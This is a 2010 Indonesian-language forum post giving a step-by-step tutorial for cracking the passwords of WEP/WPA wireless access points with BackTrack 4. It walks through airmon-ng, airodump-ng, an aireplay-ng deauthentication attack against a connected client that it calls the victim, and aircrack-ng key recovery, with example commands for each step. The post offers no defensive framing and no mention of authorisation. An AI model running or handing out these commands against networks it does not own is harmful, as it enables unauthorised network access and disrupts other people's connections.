IBC forum
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Similar topics
Latest topics
» Purchasing Tag Heuer Watches on a Budget
 crack WEP /WAP BackTrack 4 Icon_minitimeMon Mar 20, 2017 9:17 pm by fitch65221023

» Tag Heuer Gets A Taste
 crack WEP /WAP BackTrack 4 Icon_minitimeMon Mar 20, 2017 9:11 pm by fitch65221023

» U.s. Remains World's Top Platinum Watch Market
 crack WEP /WAP BackTrack 4 Icon_minitimeWed Dec 28, 2016 8:54 pm by fitch65221023

» The U.S. platinum watch market saw some other notable trends
 crack WEP /WAP BackTrack 4 Icon_minitimeWed Dec 28, 2016 8:50 pm by fitch65221023

» Do You Love Luxury Panerai Watches?
 crack WEP /WAP BackTrack 4 Icon_minitimeWed Dec 28, 2016 8:46 pm by fitch65221023

» Aqua Master Watches for this Christmas Season
 crack WEP /WAP BackTrack 4 Icon_minitimeWed Dec 28, 2016 8:40 pm by fitch65221023

» A Guide To Womens Watches: Styles And Types
 crack WEP /WAP BackTrack 4 Icon_minitimeThu Nov 10, 2016 9:25 pm by fitch65221023

» Aqua Master Diamond Watches For Women
 crack WEP /WAP BackTrack 4 Icon_minitimeThu Nov 10, 2016 9:09 pm by fitch65221023

» A Luxury Watch To Celebrate Achievements
 crack WEP /WAP BackTrack 4 Icon_minitimeMon Sep 12, 2016 10:03 pm by fitch65221023

IBC chat

ShoutMix chat widget
Navigation
 Portal
 Index
 Memberlist
 Profile
 FAQ
 Search

crack WEP /WAP BackTrack 4

Go down

 crack WEP /WAP BackTrack 4 Empty crack WEP /WAP BackTrack 4

Post  sinax89 Mon Jul 26, 2010 2:12 pm

cuma share aj.... bagi yang master... ! baca2 aj... x aj lupa... hehe....

Ok langsung aj kawan gmn cara mengetauhui pasword Acces Point dengan sekurity WEP/WAP

ada 4 komponen yang harus di siapkan tp klw di BT4... weh... udah Komplite.. yaitu :

---> airmon-ng
---> airodump-ng
---> aireplay-ng
---> aircrack-ng

Langkah awal... siap kan kopi + makanan.. biar gx ngantuk.. hehe... becanda deh..

oke... kita langsung.....!

1) buka terminal (klw gx tau kebangetan..!!)

2) ketik airmon-ng start [interface]

contoh :
airmon-ng start wlan0

3) ketik airodump-ng --channel [num] --write [nama_file] [interface]

contoh :
airodump-ng --channel 1 --write sina wlan0

ket : untuk melihat channelnya cukup ketik airodump-ng wlan0 baru kita menggunakan perintah no 3.

4) buka terminal baru, kemudian ketik : aireplay-ng --deauth 15 -c [mac_client] -a[mac_AP] mon0

contoh :
aireplay-ng --deauth 15 -c 00:fa:cb:5b:fv:c5 -a 00:0a:br:4r:vg:6y mon0

5) Buka terminal baru, kemudian ketik : aircrack-ng -z [nama_file]-01.cap -b [mac_AP]

contoh :
aircrack-ng -z sina-01.cap -b 00:0a:br:4r:vg:6y

6) perhatikan...!! jika tidak terjadi kesalahan, dengan kata lalin spoof yang di berikan kepada korban (client) dapat diterima maka pasword akan terlihan dengan persentase 100 %

slamat mecoba...!!Twisted Evil



by : sinax89
Evil or Very Mad
sinax89
sinax89
Admin

Posts : 72
Join date : 2009-10-13
Age : 34
Location : Bekasi

https://ibc-forum.forumotion.com

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum